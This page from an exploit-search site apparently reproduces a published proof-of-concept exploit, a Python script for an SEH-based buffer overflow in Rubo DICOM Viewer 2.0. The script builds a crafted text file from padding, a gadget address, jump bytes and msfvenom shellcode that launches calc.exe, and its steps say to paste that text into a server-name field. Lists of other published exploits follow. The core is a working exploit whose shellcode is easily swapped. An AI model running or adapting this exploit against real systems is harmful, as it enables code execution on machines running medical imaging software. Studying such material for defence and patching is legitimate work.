Search for hundreds of thousands of exploits

"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)"

Author

Exploit author

bzyo

Platform

Exploit platform

windows

Release date

Exploit published date

2020-04-20

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to "DICOM server name" field
# 6. pop calc

#!/usr/bin/python

import struct

junk1 = "A"*1868

#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack('<L',0x00402f0e)

jmp1 = "\xeb\xf8\xcc\xcc"

jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
#Payload size: 220 bytes
calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")

junk2 = "\x90"*14

buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh 

with open("overview.txt","wb") as f:
    f.write(buffer[:-1])
Release DateTitleTypePlatformAuthor
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Γ–zeser"
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel MonzΓ³n"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
Release DateTitleTypePlatformAuthor
2020-04-20"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)"localwindowsbzyo
2019-05-17"Iperius Backup 6.1.0 - Privilege Escalation"localwindowsbzyo
2019-05-06"NSClient++ 0.5.2.35 - Privilege Escalation"localwindowsbzyo
2019-02-14"exacqVision ESM 5.12.2 - Privilege Escalation"localwindowsbzyo
2019-01-30"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-28"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-11"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)"localwindowsbzyo
2019-01-10"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2018-12-27"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"Iperius Backup 5.8.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-20"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"localwindowsbzyo
2018-12-20"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)"localwindows_x86bzyo
2018-12-11"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion"webappsmultiplebzyo
2018-09-12"SynaMan 4.0 build 1488 - SMTP Credential Disclosure"webappswindowsbzyo
2018-09-12"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)"webappswindowsbzyo
2018-08-06"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Privilege Escalation"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)"localwindowsbzyo
2018-05-06"HWiNFO 5.82-3410 - Denial of Service"doswindowsbzyo
2018-04-24"RGui 3.4.4 - Local Buffer Overflow"localwindowsbzyo
2018-04-18"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities"webappsxmlbzyo
2018-04-17"Reaper 5.78 - Local Buffer Overflow"localwindowsbzyo
2018-04-09"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)"localwindowsbzyo
2018-04-02"WebLog Expert Enterprise 9.4 - Privilege Escalation"localwindowsbzyo
2018-03-26"LabF nfsAxe 3.7 - Privilege Escalation"localwindowsbzyo
2018-03-23"WM Recorder 16.8.1 - Denial of Service"doswindowsbzyo
2018-03-05"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow"localwindowsbzyo
2018-03-02"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)"localwindowsbzyo
2018-03-02"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)"localwindowsbzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48351/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.